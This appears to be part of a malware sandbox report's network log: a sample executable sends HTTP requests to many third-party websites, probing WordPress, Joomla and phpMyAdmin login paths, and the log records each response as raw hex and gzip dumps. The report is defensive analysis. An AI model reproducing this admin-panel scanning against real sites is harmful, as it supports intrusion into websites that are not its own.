37 19 fe 1f f2 5d c7 58 9b 31 5e 34 e0 ea c0 bf 9e 24 fa 77 6c 8a b2 78 29 d8 57 aa 03 75 dc 8c b3 5d 51 e4 d0 b4 bc dc ea 79 d6 5c 91 88 e9 a9 12 a9 5a c5 e9 79 af e5 83 65 53 1f b5 2b d7 e9 44 cb 81 0e cb 62 8c 20 5b ff 4e fa 3d d6 55 4a a4 cf ca bc 9a 5a b9 f1 69 9a ac 4a ca 06 b1 4a 39 95 0c ee f3 0d 04 fd ba 74 0d fa 55 85 7e 15 e8 52 b1 2e 6b 63 f6 08 2c 9e 19 3b 83 1b fb 1a 37 58 3a 87 d5 30 f6 f6 a4 7c fe 9b 58 49 3c 79 fe 5e d1 42 c1
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C0WYo6~U`F%[+Cb}h>PeDxJ8b\bMNaR>83fG(W-H"-,+XcGFHdffZb"jX#*"1XJ=XJXSL"8bdB&X7"%{)NX]7}sEvRM)BJeSs,[![IL"yUlES~ItWDN;&|&D#U,"&hT?%8>/fC=,Xei),N:v,sXJtM6gx?>F;GP7s[]Es/Z0@{9`#/F8e.PMhoo2p\7aoE-jQ`b0$Da";N#;Xk>0eFg}R7'Y5.8=~":1yQ"Ec0:l{~wm'`5uVR<;P$Ap-]=@]RdK5lf^expKP1#kifr[MgyoO)\'IrB!c*-U1bLMBx~4Q'KJLkHQk='g\<B|Rl@IJ3 Y<Yayt'El/i7]X1^4$wlx)Wu]Qy\ZyeS+Db [N=UJZiJJ9tU~R.kc,;7X:0|XI<y^B
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.892571926 CET227INData Raw: 92 14 10 6a af 0b b9 88 1e 68 fc 2e e8 e7 87 40 12 fa 07 dd ed a2 b5 53 1c 2c 59 92 8b 94 70 7e 3c a6 db e7 7a ad db 8f 53 08 b4 29 e7 63 27 24 c3 e1 d0 89 bd d1 28 22 e3 c8 23 3e 99 10 ea 4d 86 8e eb 38 71 18 f4 4b b6 20 3c 5a 7e db ee 59 8a 70
                                                                                                                                                                                                                                                                                                                                Data Ascii: jh.@S,Yp~<zS)c'$("#>M8qK <Z~Yp$pFtV)o-&w)X`Ovm>]@s:^'|\_?7hj":%-ws|:nq~CAAF[0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.892919064 CET224OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://eshopy-katalog.sk/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.145463943 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 591
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 5b 73 e2 36 14 7e cf af 38 eb 0c 03 4c 6d f0 05 83 21 86 e9 76 77 3b cd 43 a7 9d 4d f6 a1 ed f4 41 d8 32 a8 91 2d 57 16 21 6c 67 ff 7b 8f 6c 73 73 08 99 30 9d 0a 7c 91 ce d1 a7 a3 73 d3 71 f8 2e 16 91 da e4 14 96 2a e5 b3 ab 50 3f 80 93 6c 31 35 68 66 cc ae 70 84 92 78 76 05 d8 c2 94 2a 02 d1 92 c8 82 aa a9 b1 52 89 15 18 87 a4 8c a4 74 6a 3c 32 ba ce 85 54 06 44 22 53 34 43 d6 35 8b d5 72 1a d3 47 16 51 ab ec 98 c0 32 a6 18 e1 56 11 11 4e a7 8e 09 c5 52 b2 ec c1 52 c2 4a 98 9a 66 e2 04 b4 14 73 a1 8a 03 e0 4c b0 2c a6 4f 26 64 22 11 9c 8b b5 7e 23 32 5a b2 47 ba 9d af 98 e2 74 f6 49 4a 21 61 60 7b 61 bf 1a a8 88 85 da 6c df 75 d3 db 37 77 bd b9 88 37 f0 cf ae 5b 32 50 b6 58 aa 09 38 b6 dd ba 39 a2 94 db 3a 45 48 89 5c b0 6c 02 f6 f1 70 4e e2 98 65 8b a3 f1 6f bb b7 73 32 24 b8 7b 2b 21 29 e3 9b 09 58 24 cf 39 b5 8a 4d a1 68 6a c2 0f 1c 75 f8 33 89 ee ca fe 8f c8 69 82 71 47 17 82 c2 97 5b c3 84 cf 5a 83 c2 84 9f 28 7f a4 8a 45 c4 84 f7 12 cd 80 ea 27 59 61 15 54 b2 04 67 bc d7 a0 f0 41 70 d4 d9 a7 54 fc c5 8c 03 98 13 23 77 9b 74 2e b8 71 bc c3 39 89 1e 16 52 ac b2 d8 8a 34 d2 04 96 05 27 1d db 04 bb 65 96 8a c2 7b f7 c5 39 2c 25 0b 3a 01 49 62 ed 26 0b fd 44 9b 77 88 02 c7 6b c1 78 8c b3 4b 3c d7 0f 8e 11 c1 ce d1 23 94 c4 0d e5 44 e2 1c f0 ed 56 d7 3c 85 34 72 11 69 b8 45 f2 dc 8b 81 82 51 0b 86 de 16 c8 71 2f 47 1a 8c 5b e0 fb 7b a4 e1 c5 48 be d3 02 67 b0 53 93 7d b9 4c 5a e1 3b 91 dc c1 e5 40 1e aa c9 1d ed f5 ed 6d 51 06 ce 5b a1 1c dc 9d b7 33 9d eb fa 26 8c b4 01 5c f7 ad 48 81 df 82 41 f0 9f 08 15 0c 5a 7a 8f 6f 13 aa 91 17 44 81 89 51 60 c2 90 94 13 85 89 ec 6c 7e 58 3a 8d ec 60 ad e9 fc 81 29 eb 30 fa 38 cb 27 a0 e8 93 ba 39 c9 aa 29 98 74 39 df c6 e9 81 84 2f 87 f4 0b a0 17 81 d5 b1 8e c9 8b 12 b9 d7 28 3a 9e 1f d3 85 09 d7 b1 67 db 01 fa dd b5 9d b8 83 a1 d7 d4 59 95 4b f1 ec 40 91 ec 9e 4f d3 b3 3a bb d6 e7 07 c1 b5 64 43 77 75 0e f7 ec 43 00 dd 76 39 1c c8 4a 89 c6 36 c4 93 55 2c 49 2c d6 68 b2 c5 5c 27 24 34 fb fe 66 f7 2a c3 83 53 5f fa 9d 65 78 86 9a 15 bf 8f 19 51 5f 63 4f 33 bb 7e c5 ed 97 53 6c 7d b7 dc d2 6f 4a 66 9d 3d ab 7f cf ab 18 3d 7d 1b 96 7c fa f5 25 1d 4f e0 3a 49 92 d3 0e 30 17 32 a6 d2 d2 6a 5f 15 13 f0 9b 28 56 2a be be ca f4 1a 7d ef d8 64 5e 08 be 52 f4 98 5e 1a cf 6f 9e 9e 9c 26 ea c4 70 e9 54 89 90 69 ed 5f 18 29 b4 63 f9 3a 6a ad e7 31 55 fa 24 e1 6c 81 8b 47 e8 58 54 9e f5 8f ef 53 8a 91 0d 22 e3 1b 28 22 49 69 06 24 8b a1 93 92 27 ab 76 91 81 36 4c b7 e1 3e 2f fa 95 6e f5 c4 c0 6e 1d 91 be 5d 24 08 cb f6 82 38 5a 90 a6 7c e3 e1 ff 21 df 75 8c b5 19 e3 45 03 ae 0e fc eb 71 a2 7f c7 a6 28 8b 97 82 7d a5 3a 50 83 66 9c ed 8a 22 87 a6 e5 e5 56 cf b3 e6 8a 44 4c 4f 95 48 d5 2a 4e cf 7b 2d 1f 2c 9b fa a8 5d b9 4e 27 5a 0e 74 58 16 63 04 d9 fa 77 d2 ef b1 ae 52 22 7d 56 e6 d5 d4 ca 8d 4f d3 64 55 52 36 88 55 ca a9 64 70 9f 6f 20 ec d7 a5 6b d8 af 2a f4 ab 50 97 8a 75 59 1b b3 47 60 f1 d4 d8 19 dc d8 d7 b8 e1 d2 39 ac 86 b1 b7 27 e5 b3 df c4 4a e2 c9 f3 f7 8a 16 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C1W[s6~8Lm!vw;CMA2-W!lg{lss0|sq.*P?l15hfpxv*Rtj<2TD"S4C5rGQ2VNRRJfsL,O&d"~#2ZGtIJ!a`{alu7w7[2PX89:EH\lpNeos2${+!)X$9Mhju3iqG[Z(E'YaTgApT#wt.q9R4'e{9,%:Ib&DwkxK<#DV<4riEQq/G[{HgS}LZ;@mQ[3&\HAZzoDQ`l~X:`)08'9)t9/(:gYK@O:dCwuCv9J6U,I,h\'$4f*S_exQ_cO3~Sl}oJf==}|%O:I02j_(V*}d^R^o&pTi_)c:j1U$lGXTS"("Ii$'v6L>/nn]$8Z|!uEq(}:Pf"VDLOH*N{-,]N'ZtXcwR"}VOdUR6Udpo k*PuYG`9'J
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.145474911 CET228INData Raw: 96 a4 80 b9 f6 ba 39 17 d1 03 8d df 85 fd fc 10 48 42 ff a0 bb 5d b4 76 8a 83 25 4b 72 91 12 ce 8f c7 74 fb 5c af 75 fb 71 02 a1 36 e5 6c 18 24 f1 80 24 34 88 bd 11 8d c6 fe d8 1f f9 64 30 c2 ac 3c a7 41 10 38 61 bf 64 0b e7 47 cb 6f db 3d 4b 11
                                                                                                                                                                                                                                                                                                                                Data Ascii: 9HB]v%Krt\uq6l$$4d0<A8adGo=K.a*%d5|YS;IsNmB#(rTkwvRu^R:E{\1oh1;/ y0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                100192.168.2.45489046.229.230.107805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.626585007 CET174OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: reproma.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.880299091 CET376INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 b6 45 e3 db 4b e1 e2 71 76 e6 9b 59 ba 4b af 09 bf d7 19 9c f9 a5 84 ba 39 95 45 02 c1 1e b1 c8 78 8e 98 f2 74 73 8e 61 84 98 55 01 23 54 b9 a1 67 54 c9 56 2c c2 75 ae 97 2c 8e 62 a8 b4 83 5c cf a3 a0 b8 1d 09 c5 35 44 1f 5a 7c 3d 77 60 7f 99 45 11 3a 31 ae 24 18 f9 9a a5 75 52 40 73 2b 01 5b 31 74 63 67 9d 69 9d 36 08 9f d6 c2 b8 70 4f cf 81 1e c1 a9 ce 82 95 e6 2d 4d 48 71 f2 3b eb c2 d2 e9 3f 23 3f 1d 55 df e9 d4 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M0},MI)(EKqvYK9ExtsaU#TgTV,u,b\5DZ|=w`E:1$uR@s+[1tcgi6pO-MHq;?#?U
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.880518913 CET226OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: reproma.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://reproma.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.133486032 CET383INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 191
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 39 0e c2 30 10 45 7b 9f 62 48 4f 26 20 4a cb 05 24 88 48 61 11 32 05 65 90 07 d9 12 b1 83 ed b0 dc 1e 07 1a ca bf cc fb c3 27 e5 7e 25 cf 87 0a 36 72 db c0 e1 b4 6c ea 15 64 53 c4 ba 92 6b c4 52 96 bf 64 9e 17 88 d5 2e 13 8c eb d8 dd 04 d7 d4 aa 24 a2 89 37 12 8b 62 01 3b 17 61 ed 06 ab 38 fe 4c c6 f1 5b e2 17 a7 de e3 dd 4c fc 75 92 62 bc 17 52 13 78 ba 0f 14 22 29 38 1d 1b c0 56 75 c6 9a 10 7d 1b 9d 47 63 15 bd f2 5e f7 f0 6c 03 d8 04 b8 8e 00 70 16 a2 36 01 02 f9 07 f9 9c 63 3f 0e 7e a7 12 7c 7c 91 7d 00 cc 66 b7 ab dd 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M90E{bHO& J$Ha2e'~%6rldSkRd.$7b;a8L[LubRx")8Vu}Gc^lp6c?~||}f


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                101192.168.2.45489483.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.626965046 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: predajpaliet.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.882206917 CET556INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.predajpaliet.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 65 64 61 6a 70 61 6c 69 65 74 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: f9<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.predajpaliet.sk/administrator/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                102192.168.2.45489846.229.230.4805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.627460957 CET171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.881061077 CET376INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b8 f8 18 9b 0e f2 88 24 a8 0c 38 30 02 6d 6c 13 a0 0d ad 18 ff 5e 1e 8b e3 79 1f ba 8b 1f 51 59 15 09 5c cb 5b 0e c5 f3 92 67 11 78 3e 62 96 94 29 62 5c c6 9b 72 0c 42 c4 e4 ee 31 42 a5 eb 3b 46 a5 a8 f9 0c 9c 72 9d 60 e7 f0 04 a9 1e 1b c5 b9 18 28 6e 24 a1 b8 9a 68 a3 f9 77 c9 1d d8 9f 67 46 84 1a 56 e9 37 70 3d ec 1d c8 7a 12 60 c4 d8 2b 6b 95 1e c0 69 a8 db 56 58 0b f8 31 7e a7 5f 6a 08 8c 34 64 91 a4 b2 60 c5 38 89 31 a0 68 96 a5 75 63 6e 5d be 91 1f b2 b4 79 49 d6 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$80ml^yQY\[gx>b)b\rB1B;Fr`(n$hwgFV7p=z`+kiVX1~_j4d`81hucn]yI
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.884969950 CET208OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://abatek.sk/wp-login.php
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.145349979 CET438INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.abatek.sk/wp-admin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 6d 8e bd 0e 82 40 10 84 7b 9e 62 a5 87 15 ed cc 7a 85 82 d1 44 94 e2 2c 2c 0f 6f cd 11 39 20 78 4a 78 7b f9 69 2d 67 e6 db 99 a5 45 7c dd cb 7b 96 c0 51 a6 67 c8 6e bb f3 69 0f 7e 80 78 4a e4 01 31 96 f1 9c ac c2 25 62 72 f1 85 47 c6 d9 52 90 61 a5 07 e1 0a 57 b2 58 2f 23 48 eb 2f 6b c8 b8 b5 aa e2 ca 95 3d e1 1c 7a 84 13 4c 79 ad fb f1 3e 12 7f d8 c1 f5 a8 11 d2 30 e8 fa f1 b1 83 0d 46 bd c1 4e 28 29 30 2d 3f b7 be 71 ae d9 20 76 5d 17 aa 5c 39 7e 85 ef 17 76 4d a0 b4 2d 2a f4 85 e1 96 09 95 08 09 9b 71 79 da 1c da c7 9f bd 1f 71 38 08 a6 ee 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: m@{bzD,,o9 xJx{i-gE|{Qgni~xJ1%brGRaWX/#H/k=zLy>0FN()0-?q v]\9~vM-*qyq8


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                103192.168.2.45491364.190.63.111805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.627608061 CET172OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: tsutomu.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.911223888 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/8.1.17
                                                                                                                                                                                                                                                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_JRpHgqJC7wrKUmkdZG4WM9JWn+YkM6xqXmLvVxr+YNtFh2qI59gSKpbnCMEU3q4hUL66ZZiPEbv/FfRYwKmxEw==
                                                                                                                                                                                                                                                                                                                                last-modified: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                x-cache-miss-from: parking-56c7b4c6cb-dk84n
                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 32 42 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 59 eb 6e db b8 12 fe 7f 9e 42 f5 22 07 ed d6 b2 65 27 76 1c 39 29 90 b6 49 2f 49 ba 4d 2f db a6 45 50 50 12 65 b1 96 48 55 a4 7c a9 d7 c0 79 8d f3 7a e7 49 ce 90 94 6c 49 96 dd 64 b1 31 12 4b e4 cc 70 2e df cc 90 cc f1 83 e7 7f 3c fb 70 f3 f6 cc 08 44 14 3e 39 96 7f 8d 10 d1 d1 49 03 d3 86 61 78 48 20 13 79 4e c8 dc f1 18 cf 4f ae ce a7 d3 e7 d7 37 af 2f d8 97 57 c1 c4 7d 73 7a 7d f6 f4 e9 f5 e9 f3 f7 d3 d3 e9 fb d3 d7 4f 4f df d0 79 f8 69 da 9d 5c de 1c 04 1f e9 d1 d4 ea ff bc be 70 82 8b a7 fe e4 fb f9 c7 67 dc 3b 0f 9d fe 07 ef 3a 98 39 47 ef 3e 7f fa 9c be 3a 10 fb 1d f7 31 1b f8 37 7f 4c da 7c f0 a3 73 f9 e2 ed 08 ed 3f 3f eb 5c b6 c5 cb 8f 07 97 67 6f ae 9e 9d 4e cf 4e 4f af 4f 4e be bd 7e 17 bf 1c fd 78 fd ec 70 9a 5c 7c 8c c6 de 97 17 07 9f ae 8e 5e 7f a2 8f 6f c6 57 fd d9 8f cf d1 e5 e4 cf 59 f2 f8 e6 8d 38 0f ba 3f 5e f5 8e 46 ef 2f 62 87 3e bb 3a fb b8 ff 03 74 ba ec f7 bf 7c 21 6f cf 9c 49 fb dc 7f 77 33 bd 88 66 67 d3 93 13 30 1d 23 ef c9 71 84 05 32 dc 00 25 1c 8b 93 46 2a 7c 73 d0 78 72 2c 88 08 f1 13 c1 53 c1 a2 b4 e5 b2 e8 df d4 e1 f1 d0 d4 5f 1f 02 c2 8d 29 76 38 11 d8 80 47 9f 25 06 47 21 7e 50 a2 ca b8 8d 77 98 b3 34 71 31 37 10 f5 8c 57 14 a8 23 24 08 a3 ad e3 b6 5e 47 2b 41 51 84 4f 1a 13 82 a7 31 4b 44 c3 70 19 15 98 82 52 53 e2 89 e0 c4 c3 13 e2 62 53 bd 34 09 25 82 a0 d0 e4 2e 2c 7b d2 69 59 cd 08 cd 48 94 46 85 91 94 e3 44 bd 22 07 46 ac 46 69 19 0f 73 37 21 b1 54 a3 b0 d2 56 c3 8c 82 2b e4 c4 1c 2c 32 7c 92 70 a1 8c 72 30 3c 68 2b 15 0f 0a 43 83 f9 86 08 40 ca da 5e c9 f5 bf ff fc 37 c1 46 c8 d8 98 d0 91 a4 6d 19 e7 09 c8 1c 61 8a 13 14 1a 82 c5 c4 e5 f0 65 44 0c 08 41 c8 34 40 42 72 1a 53 96 86 9e 81 67 31 76 85 24 f0 09 ac 1c e0 04 37 4b da 05 88 1b 44 48 15 5a c6 27 6c 04 2c c6 8a 5d 91 af 84 21 10 ce 31 4a dc 20 d3 e3 01 f8 27
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2B7YnB"e'v9)I/IM/EPPeHU|yzIlId1Kp.<pD>9IaxH yNO7/W}sz}OOyi\pg;:9G>:17L|s??\goNNOON~xp\|^oWY8?^F/b>:t|!oIw3fg0#q2%F*|sxr,S_)v8G%G!~Pw4q17W#$^G+AQO1KDpRSbS4%.,{iYHFD"FFis7!TV+,2|pr0<h+C@^7FmaeDA4@BrSg1v$7KDHZ'l,]!1J '
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.911237001 CET1286INData Raw: 24 74 fc 2f 23 fb 49 70 78 d2 20 e0 9a c6 6a 48 cc 63 70 1d 89 d0 08 b7 63 3a 5a 4f 04 09 f6 4f 1a ed 36 89 46 2d 8e 3d 16 a3 44 da 27 f5 69 0b 1c c5 21 12 98 b7 43 36 62 bc 2d e7 bf c9 c7 96 12 d1 7e 72 cc c5 1c 40 b0 12 d6 fe fd 81 41 a5 cf 42
                                                                                                                                                                                                                                                                                                                                Data Ascii: $t/#Ipx jHcpc:ZOO6F-=D'i!C6b-~r@AB\576ajY_%ro#"QPvLQ N7%deM"BPZD7M>c'MTE!NG88`n:]3y!k.
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.911509037 CET1286INData Raw: d1 dc cb 00 30 7e 82 dc f9 5b 06 47 8a f9 6e 1b 4a a4 77 37 a3 9e ed be 6e 66 63 82 cd 08 b6 49 68 84 17 ab c3 89 4f 66 d8 1b 66 35 0b 76 57 eb 2d 57 b1 e5 f5 7c f9 a9 a6 6d 96 97 a6 3c a8 a8 b4 cd 07 32 71 d5 5a 5e d6 a1 1e fb be ef df 99 a5 5c
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0~[GnJw7nfcIhOff5vW-W|m<2qZ^\62Eo.T=lQi\cwu=g6-`De+kjk]yTuf]c]2$`?%cWOAXh(kk7#P495>QxP]0*
